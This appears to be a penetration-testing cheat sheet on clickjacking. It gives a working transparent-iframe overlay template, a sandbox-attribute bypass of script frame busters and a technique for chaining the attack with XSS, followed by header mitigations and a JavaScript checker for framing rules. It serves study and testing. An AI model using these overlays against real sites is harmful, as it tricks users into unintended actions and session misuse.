Clickjacking

Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages.

-- Wikipedia

Basic clickjacking attack

Cover the target site with a near-invisible overlay, as in the snippet below, or generate one with Burp Suite's Clickbandit (Burp -> Burp Clickbandit). To prefill form fields on the target, try passing the values as URL query parameters (GET); many forms accept them. Line the decoy element up with the button you want the victim to press, then make the frame transparent.

<!DOCTYPE html>
<html>
<head>
	<style>
		/* Target site: rendered on top (z-index 2) but almost invisible.
		   While aligning the decoy with the target's button, temporarily
		   raise the opacity to e.g. 0.5 so you can see both. */
		#targetWebsite {
			position: relative;
			width: 800px;
			height: 600px;
			opacity: 0.00001;
			z-index: 2;
		}

		/* Decoy: sits underneath (z-index 1), positioned exactly where the
		   target's button lands, so the victim believes they click the decoy. */
		#decoyWebsite {
			position: absolute;
			top: 450px;
			left: 50px;
			width: 100px;
			height: 20px;
			z-index: 1;
		}
	</style>
</head>
<body>
	<div id="decoyWebsite">
	Click me
	</div>
	<!-- Query parameters prefill form fields on targets that accept them via GET -->
	<iframe id="targetWebsite" src="https://website.com?param=value">
	</iframe>
</body>
</html>

Bypass frame detection

A common protection against clickjacking is a "frame buster": a JavaScript snippet on the page that detects that it is being framed (typically by comparing top and self) and then redirects the top window. This can often be bypassed with the HTML5 sandbox attribute on the iframe: specify allow-forms, so the victim's click still submits the form, but omit allow-scripts and allow-top-navigation, so the detection script never runs and the framed page could not navigate the top window even if it did. Note that sandbox only defeats script-based detection; it does not bypass the X-Frame-Options or Content-Security-Policy frame-ancestors headers, which the browser enforces before the framed page is rendered at all.

...
<iframe sandbox="allow-forms" id="targetWebsite" src="https://website.com?param=value">
...

Combining with XSS

Sometimes the attack can be combined with XSS: prefill a vulnerable form field with an XSS payload via URL parameters and trick the victim into clicking the submit button. The payload is then submitted with the victim's session, which is useful when the injection point is only reachable through a user-initiated submit (for example a POST form).

Mitigation

  • Set the X-Frame-Options header to DENY or SAMEORIGIN. The ALLOW-FROM <website> value is obsolete and ignored by current browsers, so a header using it gives no protection.

  • Send a Content-Security-Policy: <policy> header whose <policy> contains a frame-ancestors directive set to 'none', 'self' or an explicit list of allowed origins (e.g. frame-ancestors https://trusted.example). When an enforced policy contains frame-ancestors, browsers ignore X-Frame-Options, so the CSP directive is the authoritative control; keep X-Frame-Options as a fallback for older browsers only.

  • Do not rely on JavaScript frame-busting alone; as shown above, it can be disabled by the attacker with the sandbox attribute.
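To make the two header rules concrete, here is a small checker in JavaScript (Node) that decides whether a response's headers would let a given ancestor chain frame it. It is an added example, not code from the original page or from any browser; it follows the X-Frame-Options algorithm in the HTML specification and a simplified reading of CSP frame-ancestors source matching, and assumes Node-style response headers (lowercase names, duplicate headers joined with ", "). The header values, origins and the `captured` response at the end are constructed for illustration.

```javascript
// Added example (not from the original page): decide whether a response's
// headers let a given ancestor chain frame it. CSP frame-ancestors in an
// enforced policy wins and X-Frame-Options is then ignored; otherwise
// X-Frame-Options decides; ALLOW-FROM is obsolete and current browsers treat
// it as an unrecognised value, i.e. as no protection at all.
// Assumes Node-style header objects: lowercase names, duplicates joined by ", ".

const DEFAULT_PORT = { 'https:': '443', 'http:': '80' };

// Returns one source-token list per delivered policy that carries
// frame-ancestors, or null when no policy has the directive.
function parseFrameAncestors(cspHeader) {
  if (typeof cspHeader !== 'string') return null;
  const lists = [];
  for (const policy of cspHeader.split(',')) {        // comma separates policies
    for (const directive of policy.split(';')) {
      const tokens = directive.trim().split(/\s+/).filter(Boolean);
      if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') {
        lists.push(tokens.slice(1).map((t) => t.toLowerCase()));
        break; // a repeated directive inside one policy is ignored by browsers
      }
    }
  }
  return lists.length ? lists : null;
}

// Does one frame-ancestors source expression match an ancestor origin?
function sourceMatches(token, ancestorOrigin, selfOrigin) {
  if (token === "'none'") return false;
  if (token === "'self'") return ancestorOrigin === selfOrigin;
  if (token === '*') return true;
  const ancestor = new URL(ancestorOrigin);
  // scheme-source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(token)) return ancestor.protocol === token;
  // host-source: [scheme://][*.]host[:port|:*]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/.exec(token);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme) {
    if (ancestor.protocol !== scheme + ':') return false;
  } else {
    // no scheme given: same scheme as the framed page, or an https upgrade of it
    const own = new URL(selfOrigin).protocol;
    if (ancestor.protocol !== own && !(own === 'http:' && ancestor.protocol === 'https:')) return false;
  }
  const hostOk = wildcard ? ancestor.hostname.endsWith('.' + host) : ancestor.hostname === host;
  if (!hostOk) return false;
  if (port === undefined) {
    if (ancestor.port !== '') return false; // no port in expression: default port only
  } else if (port !== '*') {
    if ((ancestor.port || DEFAULT_PORT[ancestor.protocol]) !== port) return false;
  }
  return true;
}

// headers: response headers; ancestors: one origin or the whole ancestor chain
// (parent, grandparent, ..., top); selfOrigin: origin of the framed page.
function framingAllowed(headers, ancestors, selfOrigin) {
  const chain = Array.isArray(ancestors) ? ancestors : [ancestors];
  const lists = parseFrameAncestors(headers['content-security-policy']);
  if (lists) {
    // Every enforced policy must allow every ancestor; X-Frame-Options is ignored.
    return lists.every((list) =>
      chain.every((origin) => list.some((t) => sourceMatches(t, origin, selfOrigin))));
  }
  // X-Frame-Options, following the HTML specification's algorithm.
  const xfo = (headers['x-frame-options'] || '')
    .split(',').map((v) => v.trim().toLowerCase()).filter(Boolean);
  const unique = new Set(xfo);
  if (unique.size > 1) {
    // Conflicting values: block if any of them is a real directive, else ignore.
    return !(unique.has('deny') || unique.has('sameorigin') || unique.has('allowall'));
  }
  const value = xfo[0];
  if (value === 'deny') return false;
  if (value === 'sameorigin') return chain.every((origin) => origin === selfOrigin);
  return true; // absent, ALLOW-FROM or anything else unrecognised: no restriction
}

// Usage: triage a captured response during a test (constructed sample).
const captured = { 'x-frame-options': 'ALLOW-FROM https://partner.example' };
console.log(framingAllowed(captured, 'https://attacker.example', 'https://site.example')); // true
```

The last line is the point of the first mitigation bullet: a site that relies on ALLOW-FROM is frameable by anyone in a current browser. Feed the function the headers of each authenticated page you test and the attacker origin you control; any `true` is a clickjacking candidate worth building the overlay above for.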
